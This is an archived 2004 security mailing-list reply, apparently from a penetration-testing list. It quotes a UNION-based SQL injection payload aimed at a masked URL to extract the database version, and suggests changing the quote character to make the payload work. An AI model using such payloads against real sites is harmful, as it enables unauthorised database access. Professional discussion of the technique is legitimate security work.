Re: SQL Injection & ncompatible with int issue

From: Martin Eiszner (martin@websec.org)
Date: Sun Jun 13 2004 - 06:32:13 EDT

• Next message: Kurt Grutzmacher: "Re: Lotus Notes .id file pw recover (Was Cached NT/W2k passwords)"
• Previous message: Rusty Chiles: "RE: antenna - Re: Wireless pentesting requirements"
• In reply to: Peter Bair: "SQL Injection & ncompatible with int issue"
• Next in thread: Amichai Shulman: "RE: SQL Injection & ncompatible with int issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

hi,

On 9 Jun 2004 23:51:06 -0000
Peter Bair <peterbair100@hotmail.com> wrote:

> xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--

did you try it with ' instead of " ?

mei

• Next message: Kurt Grutzmacher: "Re: Lotus Notes .id file pw recover (Was Cached NT/W2k passwords)"
• Previous message: Rusty Chiles: "RE: antenna - Re: Wireless pentesting requirements"
• In reply to: Peter Bair: "SQL Injection & ncompatible with int issue"
• Next in thread: Amichai Shulman: "RE: SQL Injection & ncompatible with int issue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:56 EDT